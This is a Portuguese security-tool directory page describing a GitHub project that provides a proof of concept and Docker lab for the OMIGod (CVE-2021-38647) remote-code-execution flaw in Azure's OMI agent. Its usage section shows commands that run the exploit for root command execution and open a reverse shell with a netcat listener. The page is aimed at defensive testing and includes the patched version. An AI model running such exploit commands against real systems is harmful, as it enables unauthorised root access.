Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-38647-POC-and-Demo-environment — OMIGod / CVE-2021-38647 POC e ambiente de demonstração | Kitploit
Ferramentas/GitHubGitHub/simenbai/cve-2021-38647-poc-and-demo-environment
Análise de VulnerabilidadesExploraçãoTestes de PenetraçãoSegurança na NuvemAprendizado e EducaçãoLabs e Prática
GitHubsimenbai/cve-2021-38647-poc-and-demo-environment

CVE-2021-38647-POC-and-Demo-environment

OMIGod / CVE-2021-38647 POC e ambiente de demonstração

Ver Repositório
3116há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Detalhes

OMIGod - CVE-2021-38647

O Open Management Infrastructure (OMI, anteriormente conhecido como NanoWBEM) é um servidor de gerenciamento de código aberto de Common Interface Model (CMI), da Microsoft e do The Open Group. O OMI é um agente de software encontrado na maioria das VMs Linux do Azure, mas muitos não sabem de sua presença.

Em 14 de setembro, a Wiz Research Team publicou um artigo detalhando quatro vulnerabilidades no OMI. As vulnerabilidades são descritas como fáceis de explorar e podem permitir que invasores executem código arbitrário remotamente e façam escalonamento para root com uma única solicitação.

Detalhes da CVE-2021-38647

A CVE-2021-38647 é uma vulnerabilidade de RCE não autenticada, explorada pelo envio de uma solicitação HTTP especialmente elaborada. A CVE-2021-38647 permite que um invasor execute comandos como o usuário do agente OMI, normalmente root.

Os agentes OMI são amplamente utilizados em servidores Linux do Azure quando esses serviços estão em uso:

  • Azure Automation
  • Azure Automatic Update
  • Azure Operations Management Suite
  • Azure Log Analytics
  • Azure Configuration Management
  • Azure Diagnostics

De acordo com a Microsoft, a maioria dos serviços do Azure que usam OMI o implantam sem expor a porta HTTP/S.

Objetivo deste projeto

O objetivo deste projeto é criar um ambiente de demonstração de forma facilmente replicável, para que as equipes de Blue Team possam encontrar IoCs com mais facilidade. Para atingir esse objetivo, crio uma imagem docker personalizada configurada com a versão vulnerável do OMI.

Uso

Dependendo da sua configuração, isso pode exigir sudo.

root@kitploit:~
# Building the docker container
docker build . -t omi-god

# Running it
docker run --name=omi-god -it omi-god

Agora você terá o terminal root do container docker aberto. Você deve obter o endereço IP do container docker, o que pode ser feito com o comando:

root@kitploit:~
# Add it to clipboard
docker inspect omi-god | jq ".[0].NetworkSettings.Networks.bridge.IPAddress" | cut -d\" -f2 | xclip -selection clipboard

# Show it in terminal
docker inspect omi-god | jq ".[0].NetworkSettings.Networks.bridge.IPAddress" | cut -d\" -f2

Quando isso estiver configurado, você pode tentar executar qualquer PoC. Para executar o PoC deste projeto, execute os seguintes comandos:

root@kitploit:~
# Execute any command as root
python3 omigod.py -t 172.17.0.2 -c id 
 -> uid=0(root) gid=0(root) groups=0(root)

# Get a reverse shell as root on the server
python3 omigod.py -t 172.17.0.2 -r -l 172.17.0.1 -p 4444 & nc -lnvp 4444 

Créditos

O vídeo do IppSec sobre este exploit e a configuração de um ambiente semelhante - https://www.youtube.com/watch?v=TXqi1BKtcyM O ambiente configurado neste projeto é baseado no vídeo do IppSec.

PoC do horizon3ai - https://github.com/horizon3ai/CVE-2021-38647 O PoC deste projeto é baseado no PoC do horizon3ai.

Para mais detalhes, consulte o trabalho dos pesquisadores originais: https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure

Versões afetadas

Todas as versões do OMI abaixo da v1.6.8-1 são vulneráveis.

Mitigações

Foi publicada uma versão corrigida que resolve este exploit. Atualize e garanta que a versão seja 1.6.8.1 ou superior.

Aviso de isenção de responsabilidade

Este software foi criado puramente para fins de pesquisa acadêmica e para o desenvolvimento de técnicas defensivas eficazes, e não se destina a ser usado para atacar sistemas, exceto quando explicitamente autorizado. Os mantenedores do projeto não são responsáveis pelo uso indevido do software. Use com responsabilidade.

Baixar ferramenta